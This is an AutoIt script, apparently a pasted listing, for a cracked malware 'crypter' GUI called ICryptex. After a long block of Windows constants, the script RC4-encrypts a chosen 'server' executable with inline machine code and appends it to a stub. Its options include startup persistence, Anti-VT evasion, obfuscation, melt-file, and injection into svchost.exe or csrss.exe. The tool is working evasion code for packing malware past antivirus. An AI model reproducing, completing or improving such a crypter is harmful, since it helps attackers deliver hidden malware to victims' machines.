  726. Global Const $htgrowbox = 4
  727. Global Const $htsize = $htgrowbox
  728. Global Const $htmenu = 5
  729. Global Const $hthscroll = 6
  730. Global Const $htvscroll = 7
  731. Global Const $htminbutton = 8
  732. Global Const $htmaxbutton = 9
  733. Global Const $htleft = 10
  734. Global Const $htright = 11
  735. Global Const $httop = 12
  736. Global Const $httopleft = 13
  737. Global Const $httopright = 14
  738. Global Const $htbottom = 15
  739. Global Const $htbottomleft = 16
  740. Global Const $htbottomright = 17
  741. Global Const $htborder = 18
  742. Global Const $htreduce = $htminbutton
  743. Global Const $htzoom = $htmaxbutton
  744. Global Const $htsizefirst = $htleft
  745. Global Const $htsizelast = $htbottomright
  746. Global Const $htobject = 19
  747. Global Const $htclose = 20
  748. Global Const $hthelp = 21
  749. Global Const $color_scrollbar = 0
  750. Global Const $color_background = 1
  751. Global Const $color_activecaption = 2
  752. Global Const $color_inactivecaption = 3
  753. Global Const $color_menu = 4
  754. Global Const $color_window = 5
  755. Global Const $color_windowframe = 6
  756. Global Const $color_menutext = 7
  757. Global Const $color_windowtext = 8
  758. Global Const $color_captiontext = 9
  759. Global Const $color_activeborder = 10
  760. Global Const $color_inactiveborder = 11
  761. Global Const $color_appworkspace = 12
  762. Global Const $color_highlight = 13
  763. Global Const $color_highlighttext = 14
  764. Global Const $color_btnface = 15
  765. Global Const $color_btnshadow = 16
  766. Global Const $color_graytext = 17
  767. Global Const $color_btntext = 18
  768. Global Const $color_inactivecaptiontext = 19
  769. Global Const $color_btnhighlight = 20
  770. Global Const $color_3ddkshadow = 21
  771. Global Const $color_3dlight = 22
  772. Global Const $color_infotext = 23
  773. Global Const $color_infobk = 24
  774. Global Const $color_hotlight = 26
  775. Global Const $color_gradientactivecaption = 27
  776. Global Const $color_gradientinactivecaption = 28
  777. Global Const $color_menuhilight = 29
  778. Global Const $color_menubar = 30
  779. Global Const $color_desktop = 1
  780. Global Const $color_3dface = 15
  781. Global Const $color_3dshadow = 16
  782. Global Const $color_3dhighlight = 20
  783. Global Const $color_3dhilight = 20
  784. Global Const $color_btnhilight = 20
  785. Global Const $hinst_commctrl = -1
  786. Global Const $idb_std_small_color = 0
  787. Global Const $idb_std_large_color = 1
  788. Global Const $idb_view_small_color = 4
  789. Global Const $idb_view_large_color = 5
  790. Global Const $idb_hist_small_color = 8
  791. Global Const $idb_hist_large_color = 9
  792. Global Const $startf_forceofffeedback = 128
  793. Global Const $startf_forceonfeedback = 64
  794. Global Const $startf_runfullscreen = 32
  795. Global Const $startf_usecountchars = 8
  796. Global Const $startf_usefillattribute = 16
  797. Global Const $startf_usehotkey = 512
  798. Global Const $startf_useposition = 4
  799. Global Const $startf_useshowwindow = 1
  800. Global Const $startf_usesize = 2
  801. Global Const $startf_usestdhandles = 256
  802. Global Const $cdds_prepaint = 1
  803. Global Const $cdds_postpaint = 2
  804. Global Const $cdds_preerase = 3
  805. Global Const $cdds_posterase = 4
  806. Global Const $cdds_item = 65536
  807. Global Const $cdds_itemprepaint = 65537
  808. Global Const $cdds_itempostpaint = 65538
  809. Global Const $cdds_itempreerase = 65539
  810. Global Const $cdds_itemposterase = 65540
  811. Global Const $cdds_subitem = 131072
  812. Global Const $cdis_selected = 1
  813. Global Const $cdis_grayed = 2
  814. Global Const $cdis_disabled = 4
  815. Global Const $cdis_checked = 8
  816. Global Const $cdis_focus = 16
  817. Global Const $cdis_default = 32
  818. Global Const $cdis_hot = 64
  819. Global Const $cdis_marked = 128
  820. Global Const $cdis_indeterminate = 256
  821. Global Const $cdis_showkeyboardcues = 512
  822. Global Const $cdis_nearhot = 1024
  823. Global Const $cdis_othersidehot = 2048
  824. Global Const $cdis_drophilited = 4096
  825. Global Const $cdrf_dodefault = 0
  826. Global Const $cdrf_newfont = 2
  827. Global Const $cdrf_skipdefault = 4
  828. Global Const $cdrf_notifypostpaint = 16
  829. Global Const $cdrf_notifyitemdraw = 32
  830. Global Const $cdrf_notifysubitemdraw = 32
  831. Global Const $cdrf_notifyposterase = 64
  832. Global Const $cdrf_doerase = 8
  833. Global Const $cdrf_skippostpaint = 256
  834. Global Const $gui_ss_default_gui = BitOR($ws_minimizebox, $ws_caption, $ws_popup, $ws_sysmenu)
  835. #EndRegion
  836. #Region ### START Koda GUI section ### Form=
  837. Opt("GuiOnEventMode", 1)
  838. $skin = @ScriptDir & "\1.msstyles"
  839. DllCall("kernel32.dll", "handle", "LoadLibraryW", "wstr", "Skin.dll")
  840. DllCall("Skin.dll", "int", "USkinInit", "ptr", "", "ptr", "", "str", $skin)
  841. $form1 = GUICreate("ICryptex Sécurity Ultimate", 386, 354, -1, -1, -1)
  842. $pic3 = GUICtrlCreatePic("C:\Windows\Microsoft.NET\icrypt.jpg", 0, 0, 385, 121)
  843. $tab1 = GUICtrlCreateTab(0, 120, 385, 233)
  844. GUICtrlSetResizing(-1, $gui_dockwidth + $gui_dockheight)
  845. $tabsheet1 = GUICtrlCreateTabItem("Cracked")
  846. $pic3 = GUICtrlCreatePic("C:\Windows\Microsoft.NET\icrypt.jpg", 0, 0, 385, 121)
  847. $label8 = GUICtrlCreateLabel("Skype : StanMarshHF", 8, 272, 330, 17)
  848. $label9 = GUICtrlCreateLabel("Fuck >> ICryptex !", 8, 292, 330, 17)
  849. $tab2 = GUICtrlCreateTab(0, 120, 385, 233)
  850. GUICtrlSetResizing(-1, $gui_dockwidth + $gui_dockheight)
  851. $tabsheet5 = GUICtrlCreateTabItem("By")
  852. $label5 = GUICtrlCreateLabel("Choose your Stub :", 8, 160, 128, 17)
  853. $textbox2 = GUICtrlCreateInput("", 8, 176, 369, 21)
  854. $button3 = GUICtrlCreateButton("*.exe", 8, 200, 59, 17, $ws_group)
  855. $tabsheet3 = GUICtrlCreateTabItem("StanMarsh")
  856. $checkbox11 = GUICtrlCreateCheckbox("Startup", 16, 220, 56, 17)
  857. $checkbox5 = GUICtrlCreateCheckbox("Anti-Methods", 80, 220, 80, 17)
  858. $checkbox6 = GUICtrlCreateCheckbox("Anti-VT", 168, 220, 57, 17)
  859. $checkbox3 = GUICtrlCreateCheckbox("Obfuscation", 225, 220, 80, 17)
  860. $checkbox9 = GUICtrlCreateCheckbox("Melt File", 305, 220, 75, 17)
  861. $label5 = GUICtrlCreateLabel("Choose Injection :", 12, 252, 90, 17)
  862. $combo1 = GUICtrlCreateCombo("vbc.exe", 108, 250, 80, 17)
  863. GUICtrlSetData(-1, "csrss.exe|svchost.exe", "vbc.exe")
  864. $label9 = GUICtrlCreateLabel("Mutex :", 12, 275, 90, 17)
  865. $textbox9 = GUICtrlCreateInput("", 55, 275, 133, 17)
  866. $label1 = GUICtrlCreateLabel("Choose your server encrypted :", 8, 152, 180, 17)
  867. $textbox1 = GUICtrlCreateInput("", 8, 176, 369, 21)
  868. $button1 = GUICtrlCreateButton("*.exe", 8, 200, 59, 17, $ws_group)
  869. $button2 = GUICtrlCreateButton("Encrypt", 144, 320, 75, 25, $ws_group)
  870. GUISetState(@SW_SHOW)
  871. GUICtrlSetOnEvent($button1, "FirstDialog")
  872. GUICtrlSetOnEvent($button2, "EncryptData")
  873. GUICtrlSetOnEvent($button3, "SecondeDialog")
  874. GUISetOnEvent($gui_event_close, "ForExit")
  875. #EndRegion ### END Koda GUI section ###
  876. While 1
  877.     Sleep(1)
  878. WEnd
  879.  
  880. Func forexit()
  881.     Exit
  882. EndFunc
  883.  
  884. Func firstdialog()
  885.     GUICtrlSetData($textbox1, FileOpenDialog("Choose your server Encrypted", @DesktopDir, "Executable(*.exe)"))
  886. EndFunc
  887.  
  888. Func secondedialog()
  889.     GUICtrlSetData($textbox2, FileOpenDialog("Choose your Stub", @DesktopDir, "Executable(*.exe)"))
  890. EndFunc
  891.  
  892. Func encryptdata()
  893.     FileWrite($textbox2, "StanMarsh123")
  894.     $keyencryption = "StanMarsh"
  895.     $stubpath = FileOpen(GUICtrlRead($textbox2))
  896.     $stubbyte = FileRead($stubpath)
  897.     $sarquive = _rc4(FileRead(FileOpen(GUICtrlRead($textbox1))), $keyencryption)
  898.     $savefiledialog = FileOpen(FileSaveDialog("Save your server encrypted", @ScriptDir, "PE Files(*.exe)") & ".exe", 18)
  899.     FileWrite($savefiledialog, $stubbyte)
  900.     FileWrite($savefiledialog, StringToBinary($keyencryption))
  901.     FileWrite($savefiledialog, $sarquive)
  902.     FileClose($stubpath)
  903.     FileClose($textbox1)
  904.     FileClose($savefiledialog)
  905.     MsgBox(64, "ICryptex", "Sucess !")
  906. EndFunc
  907.  
  908. Func _rc4($data, $key)
  909.     Local $opcode = "0xC81001006A006A005356578B551031C989C84989D7F2AE484829C88945F085C00F84DC000000B90001000088C82C0188840DEFFEFFFFE2F38365F4008365FC00817DFC000100007D478B45FC31D2F775F0920345100FB6008B4DFC0FB68C0DF0FEFFFF01C80345F425FF0000008945F48B75FC8A8435F0FEFFFF8B7DF486843DF0FEFFFF888435F0FEFFFFFF45FCEBB08D9DF0FEFFFF31FF89FA39550C76638B85ECFEFFFF4025FF0000008985ECFEFFFF89D80385ECFEFFFF0FB6000385E8FEFFFF25FF0000008985E8FEFFFF89DE03B5ECFEFFFF8A0689DF03BDE8FEFFFF860788060FB60E0FB60701C181E1FF0000008A840DF0FEFFFF8B750801D6300642EB985F5E5BC9C21000"
  910.     Local $codebuffer = DllStructCreate("byte[" & BinaryLen($opcode) & "]")
  911.     DllStructSetData($codebuffer, 1, $opcode)
  912.     Local $buffer = DllStructCreate("byte[" & BinaryLen($data) & "]")
  913.     DllStructSetData($buffer, 1, $data)
  914.     DllCall("user32.dll", "none", "CallWindowProc", "ptr", DllStructGetPtr($codebuffer), "ptr", DllStructGetPtr($buffer), "int", BinaryLen($data), "str", $key, "int", 0)
  915.     Local $ret = DllStructGetData($buffer, 1)
  916.     $buffer = 0
  917.     $codebuffer = 0
  918.     Return $ret
  919. EndFunc
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement